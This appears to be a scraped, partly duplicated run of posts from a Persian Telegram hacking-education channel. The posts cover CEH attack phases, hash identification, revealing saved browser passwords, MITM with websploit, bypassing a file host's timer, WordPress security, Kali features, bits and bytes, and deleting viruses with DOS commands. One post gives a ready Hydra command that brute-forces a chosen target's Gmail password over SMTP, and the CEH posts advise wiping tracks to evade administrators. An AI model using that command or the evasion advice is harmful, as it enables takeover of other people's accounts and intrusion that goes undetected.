دوره آموزشی Ceh
قسمت چهارم :
حملات به دو دسته تقسیم میشوند حملات پسیو (Passive) حمله اکتیو (Active) حملات پسیو فقط به دنبال جمع آوری اطلاعات از سیستم هستند ولی حملات اکتیو سیستم و شبکه را تغییر میدهد.
حملات به دو صورت داخلی و بیرونی انجام میشوند حملات داخلی در داخل شرکت یا سازمان اتفاق می افتد ولی حملات بیرونی از طریق اینترنت انجام میشوند.
پنج مرحله هکر قانونمند برای حمله :
۱- جمع آوری اطلاعات
۲- اسکن
۳- ایجاد دسترسی
۴- حفظ دسترسی
۵- پاک کردن ردپا
در مطالب آینده به هر یک از مراحل میپردازیم.
ادامه دارد.....
#ceh #episode #4
Author:UltraSecteam
🌹برترين كانال آموزش🌹
@FullSecurity
قسمت چهارم :
حملات به دو دسته تقسیم میشوند حملات پسیو (Passive) حمله اکتیو (Active) حملات پسیو فقط به دنبال جمع آوری اطلاعات از سیستم هستند ولی حملات اکتیو سیستم و شبکه را تغییر میدهد.
حملات به دو صورت داخلی و بیرونی انجام میشوند حملات داخلی در داخل شرکت یا سازمان اتفاق می افتد ولی حملات بیرونی از طریق اینترنت انجام میشوند.
پنج مرحله هکر قانونمند برای حمله :
۱- جمع آوری اطلاعات
۲- اسکن
۳- ایجاد دسترسی
۴- حفظ دسترسی
۵- پاک کردن ردپا
در مطالب آینده به هر یک از مراحل میپردازیم.
ادامه دارد.....
#ceh #episode #4
Author:UltraSecteam
🌹برترين كانال آموزش🌹
@FullSecurity
دوره آموزشی Ceh
قسمت پنجم :
در این قسمت قصد دارم پنج مرحله یک هکر قانونمند برای نفوذ را توضیح بدم.
۱- جمع آوری اطلاعات (FootPrinting) : شما برای حمله به هدف خودتون باید قبل از حمله از هدفتون اطلاعات جمع آوری کنین.این مرحله جز مهمترین مراحل هکینگ میباشد. یک هکر ۹۰ درصد وقت خودش رو صرف جمع آوری میکند و فقط ۱۰ درصد دیگر را صرف حمله میکند.
۲- اسکن (Scan) : بعد از جمع آوری اطلاعات از هدف شما باید یک اسکن از هدف بگیرید با این اسکن شما اطلاعاتی همچون سیستم عامل هدف پورت های باز سیستم ، پیدا کردن آسیب پذیری، شناسایی سرویس های فعال به دست بیاورد که بسیار مهم است.
۳- ایجاد دسترسی : در این مرحله شما باید با پیدا کردن اکسپلویت ان آسیب پذیری که در مرحله اسکن به دست آورده بودید به سیستم حمله کنید و از سیستم دسترسی بگیرید.
۴- حفظ دسترسی : شما در این مرحله باید دسترسی خود را حفظ کنید یعنی اگر بعدا بخواهید به سیستم دسترسی پیدا کنید نیازی به نفوذ مجدد نداشته باشید. هکرها از بک دورها و روت کیت ها برای حفظ دسترسی استفاده میکنند.
۵- پاک کردن ردپا : در مرحله آخر شما باید رد پای خود را روی سیستم پاک کنید این کار باعث میشود که شما توسط ادمین آن سیستم شناسایی نشوید و باعث گیر افتادن شما نشود.
به این بخش دقت کنید چون مهمه بیشتر هکرهایی که گیر افتادن به دلیل اشتباه در همین بخش بوده پس حتما توجه کنید.
ادامه دارد.....
#ceh #episode #5
Author:UltraSecteam
🌹برترين كانال آموزش🌹
@FullSecurity
قسمت پنجم :
در این قسمت قصد دارم پنج مرحله یک هکر قانونمند برای نفوذ را توضیح بدم.
۱- جمع آوری اطلاعات (FootPrinting) : شما برای حمله به هدف خودتون باید قبل از حمله از هدفتون اطلاعات جمع آوری کنین.این مرحله جز مهمترین مراحل هکینگ میباشد. یک هکر ۹۰ درصد وقت خودش رو صرف جمع آوری میکند و فقط ۱۰ درصد دیگر را صرف حمله میکند.
۲- اسکن (Scan) : بعد از جمع آوری اطلاعات از هدف شما باید یک اسکن از هدف بگیرید با این اسکن شما اطلاعاتی همچون سیستم عامل هدف پورت های باز سیستم ، پیدا کردن آسیب پذیری، شناسایی سرویس های فعال به دست بیاورد که بسیار مهم است.
۳- ایجاد دسترسی : در این مرحله شما باید با پیدا کردن اکسپلویت ان آسیب پذیری که در مرحله اسکن به دست آورده بودید به سیستم حمله کنید و از سیستم دسترسی بگیرید.
۴- حفظ دسترسی : شما در این مرحله باید دسترسی خود را حفظ کنید یعنی اگر بعدا بخواهید به سیستم دسترسی پیدا کنید نیازی به نفوذ مجدد نداشته باشید. هکرها از بک دورها و روت کیت ها برای حفظ دسترسی استفاده میکنند.
۵- پاک کردن ردپا : در مرحله آخر شما باید رد پای خود را روی سیستم پاک کنید این کار باعث میشود که شما توسط ادمین آن سیستم شناسایی نشوید و باعث گیر افتادن شما نشود.
به این بخش دقت کنید چون مهمه بیشتر هکرهایی که گیر افتادن به دلیل اشتباه در همین بخش بوده پس حتما توجه کنید.
ادامه دارد.....
#ceh #episode #5
Author:UltraSecteam
🌹برترين كانال آموزش🌹
@FullSecurity
Forwarded from FullSecurity
✅ پيدا كردن نوع هش در ويندوز
با استفاده از اين نرم افزار ميتوانيد نوع هش ها را بدست بياوريد..
كار با نرم افزار بسيار سادست..
در پست بعدی قابل دانلود میباشد.
#hash #identifier #exe
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
با استفاده از اين نرم افزار ميتوانيد نوع هش ها را بدست بياوريد..
كار با نرم افزار بسيار سادست..
در پست بعدی قابل دانلود میباشد.
#hash #identifier #exe
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
Forwarded from FullSecurity
✅ آموزش تصویری دیدن پسوردهای ستاره دار در 30ثانیه
با استفاده از این آموزش میتونید همه ی پسوردهای مرورگرها،فیس بوک،یاهو و ... رو که به صورت ستاره دار هستند رو ببینید
در پست بعدی قابل دانلود میباشد.
#password #browser
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
با استفاده از این آموزش میتونید همه ی پسوردهای مرورگرها،فیس بوک،یاهو و ... رو که به صورت ستاره دار هستند رو ببینید
در پست بعدی قابل دانلود میباشد.
#password #browser
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
✅ برترين كانال هك و امنيت ✅
✔️ آموزش هك و امنيت
✔️ معرفي ابزار هاي هك
✔️ ارائه برترين نكات امنيتي
✔️ آموزش تكنيك هاي نفوذ
🆔
https://telegram.me/joinchat/Bz0E_D0ftaE7VRRZV-mq4Q
✔️ آموزش هك و امنيت
✔️ معرفي ابزار هاي هك
✔️ ارائه برترين نكات امنيتي
✔️ آموزش تكنيك هاي نفوذ
🆔
https://telegram.me/joinchat/Bz0E_D0ftaE7VRRZV-mq4Q
Forwarded from FullSecurity
دوستان عزيز لطفا لينك كانال رو به اشتراك بگذاريد..
افزايش كاربران كانال سبب افزايش مطالب و آموزش هاي كانال خواهد شد..
براي تبادل با ايدي زير در تماس باشيد..
@ashkan_m78
افزايش كاربران كانال سبب افزايش مطالب و آموزش هاي كانال خواهد شد..
براي تبادل با ايدي زير در تماس باشيد..
@ashkan_m78
✅ آموزش تصویری حملات MITM در كالي
با استفاده از اين آموزش ميتوانيد با استفاده از ابزار websploit در كالي حملات MITM انجام بديد.
اين آموزش همراه با صدا و زبان فارسي بوده و بصورر كامل و واضح توضيح داده شده
در پست بعدی قابل دانلود میباشد.
#MITM #websploit #kali
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
با استفاده از اين آموزش ميتوانيد با استفاده از ابزار websploit در كالي حملات MITM انجام بديد.
اين آموزش همراه با صدا و زبان فارسي بوده و بصورر كامل و واضح توضيح داده شده
در پست بعدی قابل دانلود میباشد.
#MITM #websploit #kali
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
Forwarded from FullSecurity
✅آموزش دور زدن تايمر 50 ثانيه اي اپلود بوي
با استقاده از اين آموزش ميتوانيد تايمر 50 ثانيه اي اپلود بوي را دور بزنيد و بدون معطلي دانلود كنيد..
در پست بعدی قابل دانلود میباشد.
#uploadboy #bypass
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
با استقاده از اين آموزش ميتوانيد تايمر 50 ثانيه اي اپلود بوي را دور بزنيد و بدون معطلي دانلود كنيد..
در پست بعدی قابل دانلود میباشد.
#uploadboy #bypass
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
✅یک سایت وردپرس چطور هک میشود ؟ قسمت دوم
با سلام در قسمت قبل در مورد امنیت و چگونگی هک شدن سایت وردپرسی توضیحاتی رو ارائه دادیم
یکی از دلایل هک شدن سایت های وردپرسی استفاده از پلاگین ها و پوسته های رایگان نال شده هست که به دلیل رایگان بودن هیچ اهمیتی به امنیت و باگ ها داده نشده.
بیشتر باگ ها از جمله sql Injection نیاز به این دارن که حتما توی سایت لوگین کنی تا بتونی سایت رو مورد نفوذ قرار بدی
یکی از مواردی که میتونه امنیت سایت رو تا حد خوب و مطلوبی بالا ببره عوض کردن ادرس پیشفرض صفحه ادمین و همچنین گذاشتن پسورد روی صفحه دوم یا ست کردن صفحه مدیریت روی یک ای پی خاص هست.
با این کار میتونیم از باگ های Sql Injection , Xss , Csrf تا حدودی جلوگیری کنیم و نه 100٪ درصد چرا که همیشه یک راهی برای دور زدن یا بایپس وجود داره.
دلایل دیگه هک شدن سایت های وردپرسی استفاده از حملات بروت فورس هست که بدون محدودیتی برای لوگین به صفحه ادمین یا تست پسورد اجازه به نفوذگر میده که با نوشتن برنامه ای ساده اقدام به تست پسورد های طویل کنه و با پسورد لیست قوی 100٪ به نتیجه دلخواه خودش برسه
در مورد هک شدن سایت های وردپرس از سرور هم بعدا مقاله ای توی سایت ارسال میکنیم
#wordpress #sql #injection
Author:AshKan
🌹برترين كانال آموزش🌹
@FullSecurity
با سلام در قسمت قبل در مورد امنیت و چگونگی هک شدن سایت وردپرسی توضیحاتی رو ارائه دادیم
یکی از دلایل هک شدن سایت های وردپرسی استفاده از پلاگین ها و پوسته های رایگان نال شده هست که به دلیل رایگان بودن هیچ اهمیتی به امنیت و باگ ها داده نشده.
بیشتر باگ ها از جمله sql Injection نیاز به این دارن که حتما توی سایت لوگین کنی تا بتونی سایت رو مورد نفوذ قرار بدی
یکی از مواردی که میتونه امنیت سایت رو تا حد خوب و مطلوبی بالا ببره عوض کردن ادرس پیشفرض صفحه ادمین و همچنین گذاشتن پسورد روی صفحه دوم یا ست کردن صفحه مدیریت روی یک ای پی خاص هست.
با این کار میتونیم از باگ های Sql Injection , Xss , Csrf تا حدودی جلوگیری کنیم و نه 100٪ درصد چرا که همیشه یک راهی برای دور زدن یا بایپس وجود داره.
دلایل دیگه هک شدن سایت های وردپرسی استفاده از حملات بروت فورس هست که بدون محدودیتی برای لوگین به صفحه ادمین یا تست پسورد اجازه به نفوذگر میده که با نوشتن برنامه ای ساده اقدام به تست پسورد های طویل کنه و با پسورد لیست قوی 100٪ به نتیجه دلخواه خودش برسه
در مورد هک شدن سایت های وردپرس از سرور هم بعدا مقاله ای توی سایت ارسال میکنیم
#wordpress #sql #injection
Author:AshKan
🌹برترين كانال آموزش🌹
@FullSecurity
Forwarded from FullSecurity
✅ پيدا كردن نوع هش در كالي
با استفاده از اين آموزش شما ميتوانيد نوع هش مورد نظرتون رو در كالي پيدا كنيد..
در پست بعدی قابل دانلود میباشد.
#hash #identifier #kali
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
با استفاده از اين آموزش شما ميتوانيد نوع هش مورد نظرتون رو در كالي پيدا كنيد..
در پست بعدی قابل دانلود میباشد.
#hash #identifier #kali
Author:AshKan
🌹برترین کانال آموزش🌹
@FullSecurity
✅کالی ورژن 2016 را بهتر بشناسیم !
در تاریخ 21 ژوئن سال 2016 میلاد کمپانی offensive security توزیع کننده ی سیستم عامل های کالی و بک ترک بالاخره ورژن جدید این سیستم عامل را عرضه کرد. کالی 2016 با ورژن 2016.1 جدید ترین و بروز ترین ابزار های امنیتی را به همرا دارد ! عمده ترین ویژگی این توزیع Rolling base بودن آن می باشد ! ابتدا اجازه دهید تا مختصرا راجع به توزیع های Rolling بیشتر توضیح دهیم :
-توزیع های Rolling لینوکس :
این نوع توزیع های لینوکسی از توزیعاتی هستند که مدام بروز می شوند . تقریبا چیزی شبیه به developers version . از توزیع هایی که از این سیستم استفاده می کنند می توان به Arch linux اشاره کرد که یکی از معروفترین و محبوب ترین توزیع های لینوکسی می باشد . مخلص کلام اینکه این توزیع ها جدیدترین ابزار های حودشا را در معرض کار می گذارند.
همانطور که در بالا گفته شد کالی ورژن 2016.1 از سیستم رولینگ استفاده می کند که مدام آپدیت های کوچک و بزرگی را ارائه می دهد که موجب رفع باگ یا آپدیت ابزار های امنیتی می شود !
-یکی دیگر از تغییرات مهم این ورژن استفاده از open VM tools به جای vmware tools قدیمی است . این پکیج جدید که توسط شرکت VM ارائه شده است تجربه ی بهتری را در اجرای سیستم عامل ها به صورت مجازی ارایه می دهد که در این نسخه از کالی کاملا درست و بی نقص کار می کند .
—استفاده از کرنل جدید نسخه ی 4.3.0.0 که یکی از جدیدترین کرنل های استیبل موجود است که در کارهای اساسی به خوبی خودش را نشان می دهد . این کرنل بهینه تر از کرنل های پیشین می باشد و بسیاری از باگ های آن رفع شده است !
– استفاده از آخرین نسخه های نرم افزار های موجود در کالی ویژگی معمول این توزیع است .
#kali #sana
Author:AshKan
🌹برترين كانال آموزش🌹
@FullSecurity
در تاریخ 21 ژوئن سال 2016 میلاد کمپانی offensive security توزیع کننده ی سیستم عامل های کالی و بک ترک بالاخره ورژن جدید این سیستم عامل را عرضه کرد. کالی 2016 با ورژن 2016.1 جدید ترین و بروز ترین ابزار های امنیتی را به همرا دارد ! عمده ترین ویژگی این توزیع Rolling base بودن آن می باشد ! ابتدا اجازه دهید تا مختصرا راجع به توزیع های Rolling بیشتر توضیح دهیم :
-توزیع های Rolling لینوکس :
این نوع توزیع های لینوکسی از توزیعاتی هستند که مدام بروز می شوند . تقریبا چیزی شبیه به developers version . از توزیع هایی که از این سیستم استفاده می کنند می توان به Arch linux اشاره کرد که یکی از معروفترین و محبوب ترین توزیع های لینوکسی می باشد . مخلص کلام اینکه این توزیع ها جدیدترین ابزار های حودشا را در معرض کار می گذارند.
همانطور که در بالا گفته شد کالی ورژن 2016.1 از سیستم رولینگ استفاده می کند که مدام آپدیت های کوچک و بزرگی را ارائه می دهد که موجب رفع باگ یا آپدیت ابزار های امنیتی می شود !
-یکی دیگر از تغییرات مهم این ورژن استفاده از open VM tools به جای vmware tools قدیمی است . این پکیج جدید که توسط شرکت VM ارائه شده است تجربه ی بهتری را در اجرای سیستم عامل ها به صورت مجازی ارایه می دهد که در این نسخه از کالی کاملا درست و بی نقص کار می کند .
—استفاده از کرنل جدید نسخه ی 4.3.0.0 که یکی از جدیدترین کرنل های استیبل موجود است که در کارهای اساسی به خوبی خودش را نشان می دهد . این کرنل بهینه تر از کرنل های پیشین می باشد و بسیاری از باگ های آن رفع شده است !
– استفاده از آخرین نسخه های نرم افزار های موجود در کالی ویژگی معمول این توزیع است .
#kali #sana
Author:AshKan
🌹برترين كانال آموزش🌹
@FullSecurity
✅اصطلاحات لازم و کلیدی !!!
در دنیای اینترنت تعاریف و اصلاحات زیادی وجود دارد که هرکدام در بخشی خاص کاربرد دارند یکی از این تعاریف میزان پهنای باند است که کاربران اینترنت دریافت میکنند در این مقاله شما را با این تعاریف و اصلاحات عامه و رایج آشنا میکنیم همچنین قوانین اشتراک گذاری اینترنت در کشور را بررسی میکنیم.
اینترنت در تمام دنیا برای کاربران با پهنای باند خاصی عرضه میشود نسبت به هزینه ای که میکنند ایران نیز از این قاعده مستثنی نبوده و سرعت دریافتی کاربران نسبت به هزینه پرداختی خود متفاوت است اما از نظر اکثر افراد تعاریف به درستی جا نیفتاده است و گاها دچار سردرگمی میشوند
تفاوت بیت (bit) و بایت (Byte) چیست؟
در دنیای کامپیوتر و فضای اینترنتی مفاهیم بیت و بایت جزو ساده ترین موارد میباشد. بیت کوچکترین واحد برای اندازه گیری اطلاعات در دنیای مجازی می باشد. از ترکيب هشت بيت ، يک بايت بوجود می آيد. برای درک بهتر این واحد بهتر است بدانید که برای تایپ لغت "Hello" در کامپیوتر فضایی به اندازه 40 بیت(5 بایت) اشغال می شود. هر بیت را می توان به دو صورت 0 یا 1 نمایش داد.
نکته ای که در اینجا مطرح است ، تفاوت بین بیت و بایت و کاربرد این دو واحدِ اندازه گیری می باشد. برای نشان دادن بیت از حرف b(کوچک) و بایت ازB(بزرگ) استفاده می شود.
کلیه شرکتهای ارائه دهنده خدمات اینترنت، در ایران و جهان سرویس های خود را براساس واحد کیلو بیت بر ثانیه (Kbps) ارائه می کنند؛که این در واقع سرعت اتصال شما به اینترنت را نشان می دهد. اما برای نشان دادن سرعت دانلود از کیلو بایت بر ثانیه (KBPS) استفاده می شود.
به عنوان مثال زمانی که شما سرویس 512 کیلو بیت بر ثانیه را خریداری میکنید با توجه به تعاریف موجود سرعت دانلود شما باید میزان 64 کیلو بایت بر ثانیه باشد ودر صورتی که طبق قرارداد و بنا به مصوبه سازمان تنظیم مقررات و ارتباطات رادیویی، شرکتهای ارائهدهنده خدمات اینترنتی میتوانند ضریب اشتراک حداکثر1 به 8 را برای کاربرانشان اعمال کند که این بدین معناست سرعت کاربر تا یک هشتم این میزان نیز میتواند کاهش داشته باشد.
#byte #bit
Author:AmHacker
🌹برترین کانال آموزش 🌹
@FullSecurity
در دنیای اینترنت تعاریف و اصلاحات زیادی وجود دارد که هرکدام در بخشی خاص کاربرد دارند یکی از این تعاریف میزان پهنای باند است که کاربران اینترنت دریافت میکنند در این مقاله شما را با این تعاریف و اصلاحات عامه و رایج آشنا میکنیم همچنین قوانین اشتراک گذاری اینترنت در کشور را بررسی میکنیم.
اینترنت در تمام دنیا برای کاربران با پهنای باند خاصی عرضه میشود نسبت به هزینه ای که میکنند ایران نیز از این قاعده مستثنی نبوده و سرعت دریافتی کاربران نسبت به هزینه پرداختی خود متفاوت است اما از نظر اکثر افراد تعاریف به درستی جا نیفتاده است و گاها دچار سردرگمی میشوند
تفاوت بیت (bit) و بایت (Byte) چیست؟
در دنیای کامپیوتر و فضای اینترنتی مفاهیم بیت و بایت جزو ساده ترین موارد میباشد. بیت کوچکترین واحد برای اندازه گیری اطلاعات در دنیای مجازی می باشد. از ترکيب هشت بيت ، يک بايت بوجود می آيد. برای درک بهتر این واحد بهتر است بدانید که برای تایپ لغت "Hello" در کامپیوتر فضایی به اندازه 40 بیت(5 بایت) اشغال می شود. هر بیت را می توان به دو صورت 0 یا 1 نمایش داد.
نکته ای که در اینجا مطرح است ، تفاوت بین بیت و بایت و کاربرد این دو واحدِ اندازه گیری می باشد. برای نشان دادن بیت از حرف b(کوچک) و بایت ازB(بزرگ) استفاده می شود.
کلیه شرکتهای ارائه دهنده خدمات اینترنت، در ایران و جهان سرویس های خود را براساس واحد کیلو بیت بر ثانیه (Kbps) ارائه می کنند؛که این در واقع سرعت اتصال شما به اینترنت را نشان می دهد. اما برای نشان دادن سرعت دانلود از کیلو بایت بر ثانیه (KBPS) استفاده می شود.
به عنوان مثال زمانی که شما سرویس 512 کیلو بیت بر ثانیه را خریداری میکنید با توجه به تعاریف موجود سرعت دانلود شما باید میزان 64 کیلو بایت بر ثانیه باشد ودر صورتی که طبق قرارداد و بنا به مصوبه سازمان تنظیم مقررات و ارتباطات رادیویی، شرکتهای ارائهدهنده خدمات اینترنتی میتوانند ضریب اشتراک حداکثر1 به 8 را برای کاربرانشان اعمال کند که این بدین معناست سرعت کاربر تا یک هشتم این میزان نیز میتواند کاهش داشته باشد.
#byte #bit
Author:AmHacker
🌹برترین کانال آموزش 🌹
@FullSecurity
✅خبر
باسلام خدمت اعضای کانال @FullSecurity ، ما قصد داریم که هرشب در کانال آموزش کار با کالی لینوکس ، کرکینگ و باگ یابی سایت ، نفوذ به سایت ، نفوذ به ویندوز و در آخر آموزش حرفه ای زبان #c(سی شارپ) رو براتون بذاریم .
پس تا فردا و اولین پست 🔃🔃🔃
#amozesh
Author:FullSecurity
🌹برترین کانال آموزش 🌹
@FullSecurity
باسلام خدمت اعضای کانال @FullSecurity ، ما قصد داریم که هرشب در کانال آموزش کار با کالی لینوکس ، کرکینگ و باگ یابی سایت ، نفوذ به سایت ، نفوذ به ویندوز و در آخر آموزش حرفه ای زبان #c(سی شارپ) رو براتون بذاریم .
پس تا فردا و اولین پست 🔃🔃🔃
#amozesh
Author:FullSecurity
🌹برترین کانال آموزش 🌹
@FullSecurity
✅آموزش هک جیمیل با کالی
هک Gmail با Hydra :
text by: LS 313
______________________________________________________
1-ابتدا کالی را اجرا کرده و یک ترمینال را باز کنید
2-دستور زیر را تایپ کنید:
hydra -S -l target@gmail.com -P /root/Desktop/.txt -e ns -V -s 465 smtp.gmail.com smtp
3- به جای target@gmail.com جیمیل مورد نظر رو وارد کنید
4-و یه پسورد لیست میخواید که لینوکس ازش استفاده کنه
5-در نهایت پسورد داده میشود 👀
نکته:اگه پسورد اشتباه بود پسورد لیست شما ضعیفه
#amozesh #hackgmail
Author:AmHacker
🌹برترین کانال آموزش 🌹
@FullSecurity
هک Gmail با Hydra :
text by: LS 313
______________________________________________________
1-ابتدا کالی را اجرا کرده و یک ترمینال را باز کنید
2-دستور زیر را تایپ کنید:
hydra -S -l target@gmail.com -P /root/Desktop/.txt -e ns -V -s 465 smtp.gmail.com smtp
3- به جای target@gmail.com جیمیل مورد نظر رو وارد کنید
4-و یه پسورد لیست میخواید که لینوکس ازش استفاده کنه
5-در نهایت پسورد داده میشود 👀
نکته:اگه پسورد اشتباه بود پسورد لیست شما ضعیفه
#amozesh #hackgmail
Author:AmHacker
🌹برترین کانال آموزش 🌹
@FullSecurity
✅اموزش پاک کردن ویروس dos
پاک کردن ویروس ها با استفاده از کد DOS:
ویندوز
همانطوری که مطلع هستید ویروس ها کامپیوتری تنوع بسیاری دارند و ممک است گاهی وقت ها بهترین آنتی ویروس ها نیز قادر به پاک کردن بعضی از ویروس ها نباشند.
در این مطلب روشی را برای شما عزیزا شرح خواهم داد که اگر ویروس توسط خودتون و یا آنتی ویروس تشخیص داده شد بتوانید آن را حذف نمایید.
فرض کنید یک فایل یا پوشه ای حاوی ویروس را شناسایی کردید ولی حالت عادی آنتی ویروس آن را شناسایی کرده ولی نمی تواند پاک کند و یا حتی آنتی ویروس قادر به تشخیص آن نبوده و شما با روشهای خود توانستید ویروسی بودن آن را تشخیص دهید.
ابتدا پردازه ی مربوط به آن ویروس را از زبانه ی Process در Task Manager ببندید (هر پروسس مشکوکی که تصور کردید ویروس می باشد) و سپس از کدهای زیر استفاده کنید.
کدهای Dos مورد نیاز برای پاک کردن پوشه ها و فایل ها:
در شبیه ساز DOS موجود در ویندوز Command Prompt میتوان کدهای داس را به صورت عملیاتی اجرا کرد:
پس از باز کردن نرم افزار Command prompt برای رفتن به درایو مقصد نام درایو را نوشته برای مثا E: و سپس دکمه ی Enter بزنید. برای رفتن درون هر پوشه در درایو جاری «نام پوشه CD» را وارد کنید.
حال اگر فایلی را که درون این مسیر هست بخواهید پاک کنید باید از دستور زیر استفاده کنید.”E:\Engineer\virus.exe”
دکمه1-E:àEnter
دکمه2-E:\>CD EngineeràEnter
3-E:\>Engineer\Del virus.exe /s
در دستور شماره 3 گزینه «Del name.extention» ثابت است فقط نام فایل تغییر می کند و /s اگر ویروس برای زیرکی به خود مشخصه سیستمی داده باشد نیز پاک می شود.
برا حذف پوش به جای کلمه Del از RD استفاده می شود. بقیه ی موارد شبیه به فایل است.
مراحل پاک کردن ویروسی که برای مثال در مسیر E:\Recycler قرار دارد.
ابتدا نکته ای را بگویم که بسیار برای خودم اتفاق افتاده است. بسیاری از ویروس های رایانه ای ابتدا برنامه ی فعال ساز خود را درون پوشه های Recycler در هرکدام از درایو ها کپی می کنند. در هر بارگذاری ویندوز به این پوشه های دسترسی پیدا کرده و قبل از Boot شدن کامل ویروس ها را در حافظه بارگذاری می کنند.
ماهیت اصلی این پوشه درواقع یک پوشه مخفی با مشخصه ی سیستمی است که درون آن فایلهایی که از هر درایو Delete می شوند قرار می گیرند مگر اینکه فایل ها با Shift+Delete پاک شوند در این صورت درون این پوشه باید خالی باشد و حجمی حدود 86 بایت داشته باشد. در حالت عادی این پوشه مخفی است برای مشاهده آن باید از طریق تنظیمات Folder Option و نمایش فایل های سیستمی آن را نمایان کرد.
شما می توانید تنظیمات مخفی بودن در ویندوز را نمایان کنید سپس Recycle Bin را پاک کنید، پوشه های Recycler را در هر یک از پارتیشن های ویندوز حجم آن را بررسی کنید اگر بیشتر از 100 بایت بود مطمئن باشید یک برنامه مخرب در آنجا فعال سازی، را مخفی کرده است.
حال برای پاک کردن این ویروس ها یک راه زیرکانه پیشنهاد می دهیم.
ویندوز قابلیتی به نام Safe Mode دارد که در این روش بارگذاری هیچ برنامه ای تا بالا آمدن ویندوز بارگذاری نمی شود،
برای بارگذاری در این حالت در صفحه ی دوم بارگذاری سیستم دکمه F8 را چند بار بزنید که لیستی از Mode ها نمایش داده شود.
در این حالت گزینه ی Safe Mode With Command Prompt را انتخاب کنید.
بگذارید بارگذاری ویدوز کامل شود در این حالت فقط ک صفحه سیاه رنگی شبیه DOS نمایش داده خواهد شد.
در شبیه ساز Command Prompt به کلیه ی درایو های سیستمتان سر بزنید و پوشه Recycler را حذف کنید در این صورت کلیه ی ویروس هایی که از طریق این روش بارگذاری می شوند حذف خواهند شد.
فرض کنید می خواهید E:\Recycler را حذف کنید.
1- ابتدا E: را تایپ کرده و دکمه Enter را فشار دهید
2- سپس rd Recycler /s را تایپ کنید و دکمه Enter را بزنید
3- از شما سوالی پرسیده خواهد شد که آیا می خواهید این پوشه را حذف کنید شما کاراکتر Y را بزنید یعنی بله.
4- نگران نباشید در بارگذاری به صورت نرمال پوشه Recycler دوباره ساخته خواهد شد ولی دیگر درون آن ویروس نیست.
این عمل را برای همه ی پارتیشن های هارد کامپیوترتان تکرار کنید.
#amozesh #Deletedos
Author:AmHacker
🌹برترین کانال آموزش🌹
@FullSecurity
پاک کردن ویروس ها با استفاده از کد DOS:
ویندوز
همانطوری که مطلع هستید ویروس ها کامپیوتری تنوع بسیاری دارند و ممک است گاهی وقت ها بهترین آنتی ویروس ها نیز قادر به پاک کردن بعضی از ویروس ها نباشند.
در این مطلب روشی را برای شما عزیزا شرح خواهم داد که اگر ویروس توسط خودتون و یا آنتی ویروس تشخیص داده شد بتوانید آن را حذف نمایید.
فرض کنید یک فایل یا پوشه ای حاوی ویروس را شناسایی کردید ولی حالت عادی آنتی ویروس آن را شناسایی کرده ولی نمی تواند پاک کند و یا حتی آنتی ویروس قادر به تشخیص آن نبوده و شما با روشهای خود توانستید ویروسی بودن آن را تشخیص دهید.
ابتدا پردازه ی مربوط به آن ویروس را از زبانه ی Process در Task Manager ببندید (هر پروسس مشکوکی که تصور کردید ویروس می باشد) و سپس از کدهای زیر استفاده کنید.
کدهای Dos مورد نیاز برای پاک کردن پوشه ها و فایل ها:
در شبیه ساز DOS موجود در ویندوز Command Prompt میتوان کدهای داس را به صورت عملیاتی اجرا کرد:
پس از باز کردن نرم افزار Command prompt برای رفتن به درایو مقصد نام درایو را نوشته برای مثا E: و سپس دکمه ی Enter بزنید. برای رفتن درون هر پوشه در درایو جاری «نام پوشه CD» را وارد کنید.
حال اگر فایلی را که درون این مسیر هست بخواهید پاک کنید باید از دستور زیر استفاده کنید.”E:\Engineer\virus.exe”
دکمه1-E:àEnter
دکمه2-E:\>CD EngineeràEnter
3-E:\>Engineer\Del virus.exe /s
در دستور شماره 3 گزینه «Del name.extention» ثابت است فقط نام فایل تغییر می کند و /s اگر ویروس برای زیرکی به خود مشخصه سیستمی داده باشد نیز پاک می شود.
برا حذف پوش به جای کلمه Del از RD استفاده می شود. بقیه ی موارد شبیه به فایل است.
مراحل پاک کردن ویروسی که برای مثال در مسیر E:\Recycler قرار دارد.
ابتدا نکته ای را بگویم که بسیار برای خودم اتفاق افتاده است. بسیاری از ویروس های رایانه ای ابتدا برنامه ی فعال ساز خود را درون پوشه های Recycler در هرکدام از درایو ها کپی می کنند. در هر بارگذاری ویندوز به این پوشه های دسترسی پیدا کرده و قبل از Boot شدن کامل ویروس ها را در حافظه بارگذاری می کنند.
ماهیت اصلی این پوشه درواقع یک پوشه مخفی با مشخصه ی سیستمی است که درون آن فایلهایی که از هر درایو Delete می شوند قرار می گیرند مگر اینکه فایل ها با Shift+Delete پاک شوند در این صورت درون این پوشه باید خالی باشد و حجمی حدود 86 بایت داشته باشد. در حالت عادی این پوشه مخفی است برای مشاهده آن باید از طریق تنظیمات Folder Option و نمایش فایل های سیستمی آن را نمایان کرد.
شما می توانید تنظیمات مخفی بودن در ویندوز را نمایان کنید سپس Recycle Bin را پاک کنید، پوشه های Recycler را در هر یک از پارتیشن های ویندوز حجم آن را بررسی کنید اگر بیشتر از 100 بایت بود مطمئن باشید یک برنامه مخرب در آنجا فعال سازی، را مخفی کرده است.
حال برای پاک کردن این ویروس ها یک راه زیرکانه پیشنهاد می دهیم.
ویندوز قابلیتی به نام Safe Mode دارد که در این روش بارگذاری هیچ برنامه ای تا بالا آمدن ویندوز بارگذاری نمی شود،
برای بارگذاری در این حالت در صفحه ی دوم بارگذاری سیستم دکمه F8 را چند بار بزنید که لیستی از Mode ها نمایش داده شود.
در این حالت گزینه ی Safe Mode With Command Prompt را انتخاب کنید.
بگذارید بارگذاری ویدوز کامل شود در این حالت فقط ک صفحه سیاه رنگی شبیه DOS نمایش داده خواهد شد.
در شبیه ساز Command Prompt به کلیه ی درایو های سیستمتان سر بزنید و پوشه Recycler را حذف کنید در این صورت کلیه ی ویروس هایی که از طریق این روش بارگذاری می شوند حذف خواهند شد.
فرض کنید می خواهید E:\Recycler را حذف کنید.
1- ابتدا E: را تایپ کرده و دکمه Enter را فشار دهید
2- سپس rd Recycler /s را تایپ کنید و دکمه Enter را بزنید
